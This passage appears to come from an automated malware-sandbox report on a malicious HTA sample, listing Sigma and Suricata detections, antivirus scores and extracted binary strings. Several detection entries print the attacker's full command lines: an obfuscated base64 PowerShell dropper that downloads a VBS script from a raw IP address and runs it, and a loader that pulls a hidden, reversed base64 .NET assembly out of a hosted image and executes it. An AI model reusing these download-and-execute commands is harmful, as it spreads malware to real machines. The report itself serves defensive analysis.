ZG5lLnZicyI='+[ChaR]0x22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICA

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\economicthingsaregoingaroundwithhusbandwithgoodne.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\economicthingsaregoingaroundwithhusbandwithgoodne.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7100, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\economicthingsaregoingaroundwithhusbandwithgoodne.vbs" , ProcessId: 6036, ProcessName: wscript.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7100, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.cmdline", ProcessId: 3604, ProcessName: csc.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7100, TargetFilename: C:\Users\user\AppData\Roaming\economicthingsaregoingaroundwithhusbandwithgoodne.vbs

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() | ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$brite = [System.Reflection.Assembly]::Load($carinately);$helygia = [dnlib.IO.Home].GetMethod('VAI');$helygia.Invoke($null, @('0/qvVum/r/ee.etsap//:sptth', 'creance', 'creance', 'creance', 'CasPol', 'creance', 'creance','creance','creance','creance','creance','creance','1','creance','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() | ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$b

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\economicthingsaregoingaroundwithhusbandwithgoodne.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\economicthingsaregoingaroundwithhusbandwithgoodne.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7100, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\economicthingsaregoingaroundwithhusbandwithgoodne.vbs" , ProcessId: 6036, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7100, TargetFilename: C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))", CommandLine: PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgI

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Data Obfuscation

Sigma detected: Powershell download and load assembly

Source: Process started

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7100, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.cmdline", ProcessId: 3604, ProcessName: csc.exe

Suricata Signatures

ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T16:35:02.899292+0100	2049038	1	A Network Trojan was detected	151.101.1.137	443	192.168.2.4	49731	TCP

ETPRO MALWARE ReverseLoader Payload Request (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T16:34:50.825261+0100	2858795	1	A Network Trojan was detected	192.168.2.4	49730	57.129.55.225	80	TCP

ETPRO MALWARE Terse Request to paste .ee - Possible Download

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T16:35:24.579022+0100	2841075	1	Malware Command and Control Activity Detected	192.168.2.4	49738	104.21.84.67	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta	Virustotal: Detection: 30%			Perma Link
Source: mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta	ReversingLabs: Detection: 15%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.7% probability

Source: unknown	HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.4:49738 version: TLS 1.2

Source:	Binary string: $fq7C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.pdb source: powershell.exe, 00000003.00000002.1829980353.0000000004BE8000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2154082087.0000000007870000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenc